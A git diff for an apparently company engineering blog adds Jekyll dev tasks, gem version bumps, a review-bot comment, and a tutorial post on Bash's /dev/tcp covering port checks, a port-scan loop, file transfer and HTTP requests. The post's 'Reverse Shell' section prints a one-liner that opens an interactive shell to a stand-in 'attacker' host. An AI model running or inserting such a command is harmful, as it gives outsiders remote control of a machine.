diff --git a/.vscode/tasks.json b/.vscode/tasks.json
new file mode 100644
index 0000000..94c9502
--- /dev/null
+++ b/.vscode/tasks.json
@@ -0,0 +1,34 @@
+{
+ "version": "2.0.0",
+ "tasks": [
+ {
+ "command": "rvm install ruby-2.5.1; rvm use 2.5.1; gem install bundler:2.1.4; bundle update",
+ "type": "shell",
+ "label": "Jekyll - Install Dev Server",
+ "options": {
+ "shell": {
+ "args": [
+ "--login"
+ ]
+ }
+ },
+ "problemMatcher": [],
+ "group": {
+ "kind": "test",
+ "isDefault": true
+ }
+ },
+ {
+ "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost",
+ "type": "shell",
+ "label": "Jekyll - Run Dev Server",
+ "options": {
+ "shell": {
+ "args": [
+ "--login"
+ ]
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/Gemfile.lock b/Gemfile.lock
index 0fb4e89..b3cea7b 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,10 +1,10 @@
 GEM
 remote: https://rubygems.org/
 specs:
- addressable (2.8.1)
+ addressable (2.8.4)
 public_suffix (>= 2.0.2, < 6.0)
 colorator (1.1.0)
- concurrent-ruby (1.1.10)
+ concurrent-ruby (1.2.2)
 em-websocket (0.5.3)
 eventmachine (>= 0.12.9)
 http_parser.rb (~> 0)
@@ -12,7 +12,7 @@ GEM
 ffi (1.15.5)
 forwardable-extended (2.6.0)
 http_parser.rb (0.8.0)
- i18n (1.12.0)
+ i18n (1.13.0)
 concurrent-ruby (~> 1.0)
 jekyll (4.0.1)
 addressable (~> 2.4)
@@ -41,8 +41,8 @@ GEM
 rexml
 kramdown-parser-gfm (1.1.0)
 kramdown (~> 2.0)
- liquid (4.0.3)
- listen (3.7.1)
+ liquid (4.0.4)
+ listen (3.8.0)
 rb-fsevent (~> 0.10, >= 0.10.3)
 rb-inotify (~> 0.9, >= 0.9.10)
 mercenary (0.3.6)
@@ -64,9 +64,9 @@ GEM
 terminal-table (1.8.0)
 unicode-display_width (~> 1.1, >= 1.1.1)
 thread_safe (0.3.6)
- tzinfo (1.2.10)
+ tzinfo (1.2.11)
 thread_safe (~> 0.1)
- tzinfo-data (1.2022.7)
+ tzinfo-data (1.2023.3)
 tzinfo (>= 1.0.0)
 unicode-display_width (1.8.0)
 wdm (0.1.1)
diff --git a/_data/authors.yml b/_data/authors.yml
index a9baf54..f2f3321 100644
--- a/_data/authors.yml
+++ b/_data/authors.yml
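Review bot: The "Jekyll - Install Dev Server" task runs `bundle update`, which resolves every gem to its newest allowed version and rewrites Gemfile.lock, so the lockfile this same commit bumps is bypassed on each run and the install is not reproducible; `bundle install` honours the lock. The steps are also chained with `;`, so a failed `rvm install` or `gem install bundler:2.1.4` does not stop the later ones from running. Suggest `"command": "rvm install ruby-2.5.1 && rvm use 2.5.1 && gem install bundler:2.1.4 && bundle install",`. Marking an install task with `"group": {"kind": "test", "isDefault": true}` also makes it the editor's default test task, which looks unintended; the file additionally lacks a trailing newline.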
@@ -19,3 +19,6 @@ tim_fraczak:
 david_suh:
 name: David Suh
 title: Software Engineer - Enterprise
+stefanos_kalandaridis:
+ name: Stefanos Kalandaridis
+ title: Site Reliability Engineer
diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md
new file mode 100644
index 0000000..b131c72
--- /dev/null
+++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md
@@ -0,0 +1,104 @@
+---
+layout: post
+title: Bash-ing your network with /dev/tcp
+excerpt: "In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network.
+
+Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems.
+
+/dev/udp is also valid."
+author: stefanos_kalandaridis
+categories:
+- troubleshooting
+- networking
+- security
+tags:
+- bash
+- networking
+- http
+- security
+---
+## /dev/tcp is a file descriptor of bash shell
+
+In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network.
+
+Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems.
+
+/dev/udp is also valid.
+
+- [Port Scanning](#port-scanning)
+- [Read TCP stream](#read-tcp-stream)
+- [File Transfer](#file-transfer)
+- [Reverse Shell](#reverse-shell)
+- [HTTP Requests](#http-requests)
+
+### Port scanning
+#### One of the most common uses of it is to check if a port is open in a remote host
+```
+timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && echo "open" || echo "closed"
+```
+
+#### This can be extremely usefull in cases where a machine/container doesn't have nc, curl, wget or any other utility to check for network connection
+Let's say we are in a kubernetes pod that runs on a minimal image having bash. We want to check if it can communicate with a service or if the service is actually listening on a port.
+```
+kubectl exec -it svc/random-service -- bash
+$ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed"
+```
+
+#### You can make a port scanner with it (and it's pretty fast)
+```
+for port in {1..8888}; do
+ echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"
+done
+```
+
+### Read TCP stream
+#### Get the time from nist.gov
+```
+cat < /dev/tcp/time.nist.gov/13
+```
+
+### File Transfer
+#### Option 1
+Sender
+```
+nc -lvnp 7777 < file.txt
+```
+Receiver
+```
+cat < /dev/tcp/sender/7777 > file.txt
+```
+
+#### Option 2
+
+Receiver
+```
+nc -lvnp 7777 > file.txt
+```
+Sender
+```
+cat file.txt > /dev/tcp/receiver/7777
+```
+
+### Reverse Shell
+#### Attacker
+```
+nc -lvnp 7777
+```
+#### Victim
+```
+bash -c 'bash -i >& /dev/tcp/attacker/7777 0>&1'
+```
+
+### HTTP Requests
+#### Fetching the `www.google.com` page
+```
+exec 5<>/dev/tcp/www.google.com/80
+echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&5
+cat <&5
+```
+
+
+
+### References
+- [https://tldp.org/LDP/abs/html/devref1.html](https://tldp.org/LDP/abs/html/devref1.html)
+- [https://w0lfram1te.com/exploring-dev-tcp](https://w0lfram1te.com/exploring-dev-tcp)
\ No newline at end of file